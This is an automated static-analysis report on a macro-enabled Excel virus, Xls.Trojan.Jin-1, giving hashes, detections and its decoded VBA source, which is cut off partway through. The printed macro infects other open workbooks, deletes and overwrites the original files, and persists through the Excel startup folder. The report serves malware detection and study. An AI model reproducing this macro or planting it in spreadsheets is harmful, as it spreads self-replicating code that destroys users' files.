Xls.Trojan.Jin-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 2b21a6f54cf32240…

MALICIOUS

Office (OLE)

55.5 KB Created: 1601-01-01 00:00:00 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: ea3b354367c8a721aacd854b9ff33243 SHA-1: 530af52b499a9f55f8de6a1048b669aed1f5f404 SHA-256: 2b21a6f54cf3224012949b73782955956955aea65e00eec10507c33205265d07
180 Risk Score

Malware Insights

Xls.Trojan.Jin-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a macro-enabled Excel file identified by ClamAV as Xls.Trojan.Jin-1. The Auto_Open macro attempts to infect other open workbooks by copying its own sheets into them and overwriting the target file, effectively spreading the malicious content. The VBA code is designed to hide its presence and spread to other files.

Heuristics 3

  • ClamAV: Xls.Trojan.Jin-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Jin-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17134 bytes
SHA-256: 45698aa6ec8dd3af70fd6a60e2f928190d4399eeb3c2ee02bafde1b9333b6b18
Detection
ClamAV: Xls.Trojan.Jini-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Dim infperiod As String
Sub auto_open()
'Application.DisplayStatusBar = False
Application.ScreenUpdating = False
'abc = MsgBox("AA", vbYesNo)
On Error Resume Next
'openworkbooks = Workbooks.Count
For Each w In Workbooks
    If w.Name <> ActiveWorkbook.Name Then
nameis = w.Name
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = ActiveWorkbook.Name
tobeinfected = Workbooks(nameis).FullName
namesavetoreopen = Workbooks(infectedworkbook).FullName
totalworksheets = Workbooks(nameis).Worksheets.Count
totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
Application.DisplayAlerts = False
For Each ws In Worksheets
    If ws.Name <> "shn" Then
    ws.Delete
    End If
Next ws
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
Workbooks(infectedworkbook).Sheets("shn").Visible = False
Workbooks(nameis).Close savechanges = False
Kill tobeinfected
Workbooks(infectedworkbook).SaveAs tobeinfected
Workbooks.Open namesavetoreopen
End If
End If
virustag = Empty
Next
xlstartpath = Application.StartupPath
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
infectedworkbook = ActiveWorkbook.Name
namesavetoreopen = Workbooks(infectedworkbook).FullName
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
Application.DisplayAlerts = False
For Each ws In Worksheets
    If ws.Name <> "shn" Then
    ws.Delete
    End If
Next ws
Workbooks(infectedworkbook).Sheets("Shn").Range("B76").Value = Date
ActiveWindow.Visible = False
Workbooks(infectedworkbook).SaveAs xlstartpath & "\shn.xls"
'Application.EnableEvents = False
Workbooks.Open namesavetoreopen
'Windows("shn.xls").Close savechanges = True
'Application.EnableEvents = True
End If
shfstq
'Application.OnTime Now + TimeValue("00:00:30"), "check_files"
End Sub
Sub shfstq()
'abc = MsgBox("Checking files", vbYesNo)
Application.ScreenUpdating = False
On Error Resume Next
If IsError(aa = ActiveWorkbook.Name) = True Then
Else
showworkbook = ActiveWorkbook.Name
End If
'openworkbooks = Workbooks.Count
For Each w In Workbooks
    If w.Name <> "shn.xls" Then
nameis = w.Name
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = "shn.xls"
tobeinfected = Workbooks(nameis).FullName
namesavetoreopen = Workbooks(infectedworkbook).FullName
totalworksheets = Workbooks(nameis).Worksheets.Count
'totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
Windows(infectedworkbook).Visible = True
Application.DisplayAlerts = False
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
Workbooks(infectedworkbook).Sheets("shn").Visible = False
Workbooks(nameis).Close savechanges = False
Kill tobeinfected
Workbooks(infectedworkbook).SaveAs tobeinfected
Workbooks.Open namesavetoreopen
Workbooks(showworkbook).Activate
End If
End If
virustag = Empty
Next
xlstartpath = Application.StartupPath
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
Workbooks("shn.xls").SaveAs xlstartpath & "\shn.xls"
End If
infperiod = Date - Workbooks("shn.xls").Sheets("shn").Range("B76").Value
If infperiod > 30 Then
Application.Run ("shn.xls!aista")
Application.Run ("shn.xls!payghamat")
End If

Application.OnTime Now + TimeValue("00:02:00"), "shn.xls!shfstq"
End Sub
Sub aista()
On Error Resume Next
Set mymenubar = CommandBars.ActiveMenuBar.Controls.Item(1)
'mymenubar.Delete
Set mymenubars = mymenubar.Controls.Item(1)
alread = mymenubars.Caption
If alread <> "Naya" Then
ST = 77
For changemenu = 1 To 12
Set mymenubars = mymenubar.Contr
... (truncated)